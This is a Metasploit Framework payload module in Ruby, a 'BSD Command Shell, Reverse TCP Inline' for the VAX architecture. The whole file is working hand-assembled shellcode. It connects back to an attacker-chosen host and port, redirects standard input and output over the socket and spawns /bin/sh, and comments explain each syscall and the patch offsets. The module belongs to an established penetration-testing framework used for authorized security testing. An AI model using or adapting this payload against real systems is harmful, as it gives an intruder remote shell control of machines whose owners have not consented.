GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # Byte length of the 'Payload' string below. The stub as written is exactly
  # 100 bytes; this constant has to be updated whenever the stub changes, or
  # the size the framework reports for this payload will be wrong.
  CachedSize = 100

  # This is so one-off that we define it here
  ARCH_VAX = 'vax'

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata and the hand-assembled VAX stub.
  #
  # @param info [Hash] extra metadata merged over the defaults via merge_info
  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'BSD Command Shell, Reverse TCP Inline',
      'Description' => 'Connect back to attacker and spawn a command shell',
      'Author' => 'wvu',
      'License' => MSF_LICENSE,
      'Platform' => 'bsd',
      'Arch' => ARCH_VAX,
      'Handler' => Msf::Handler::ReverseTcp,
      'Session' => Msf::Sessions::CommandShellUnix,
      'Payload' => {
        # Byte positions inside 'Payload' that are patched at generation time.
        # Both lie in the 4-byte immediates of the two `pushl` instructions
        # marked LHOST / LPORT below: their 0xdd 0x8f opcode bytes occupy
        # offsets 22-23 and 28-29, so the address immediate starts at 24 and
        # the port at 32 (the two bytes after the little-endian 0x0002 family
        # word). Inserting or removing any byte ahead of those instructions
        # invalidates both offsets, so keep them in sync with the stub.
        'Offsets' => {
          'LHOST' => [24, 'ADDR'], # 4-byte address field -> IPv4 targets only
          'LPORT' => [32, 'n']     # 16-bit port, network byte order
        },
        # Hand-assembled VAX machine code; each `chmk` is a BSD syscall trap.
        # The stage notes are inferred from the immediates and the author's
        # own "dup2" label — confirm against the target's syscall table.
        'Payload' =>
          # presumably socket(); the descriptor returned in r0 is kept in r10
          "\xdd\x00" + # pushl $0
          "\xdd\x01" + # pushl $1
          "\xdd\x02" + # pushl $2
          "\xdd\x03" + # pushl $3
          "\xd0\x5e\x5c" + # movl sp,ap
          "\xbc\x8f\x61\x00" + # chmk $61
          "\xd0\x50\x5a" + # movl r0,r10
          # build the sockaddr on the stack (r11 -> its address), then connect
          "\xdd\x00" + # pushl $0
          "\xdd\x00" + # pushl $0
          "\xdd\x8f\x00\x00\x00\x00" + # pushl LHOST
          "\xdd\x8f\x02\x00\x00\x00" + # pushl AF_INET + LPORT
          "\xd0\x5e\x5b" + # movl sp,r11
          "\xdd\x10" + # pushl $10
          "\xdd\x5b" + # pushl r11
          "\xdd\x5a" + # pushl r10
          "\xdd\x03" + # pushl $3
          "\xd0\x5e\x5c" + # movl sp,ap
          "\xbc\x8f\x62\x00" + # chmk $62
          # dup2 loop: r11 runs 0..2 (aobleq adds one and branches back while
          # r11 <= 2), duplicating the socket over stdin/stdout/stderr
          "\xd0\x00\x5b" + # movl $0,r11
          "\xdd\x5b" + # pushl r11
          "\xdd\x5a" + # pushl r10
          "\xdd\x02" + # pushl $2
          "\xd0\x5e\x5c" + # movl sp,ap
          "\xbc\x8f\x5a\x00" + # chmk $5a
          "\xf3\x02\x5b\xef" + # aobleq $2,r11,dup2
          # the two immediates spell "/bin/sh\0" once in memory; execve it
          # with NULL argv/envp
          "\xdd\x8f\x2f\x73\x68\x00" + # pushl $68732f
          "\xdd\x8f\x2f\x62\x69\x6e" + # pushl $6e69622f
          "\xd0\x5e\x5b" + # movl sp,r11
          "\xdd\x00" + # pushl $0
          "\xdd\x00" + # pushl $0
          "\xdd\x5b" + # pushl r11
          "\xdd\x03" + # pushl $3
          "\xd0\x5e\x5c" + # movl sp,ap
          "\xbc\x3b" # chmk $3b
      }
    ))
  end

end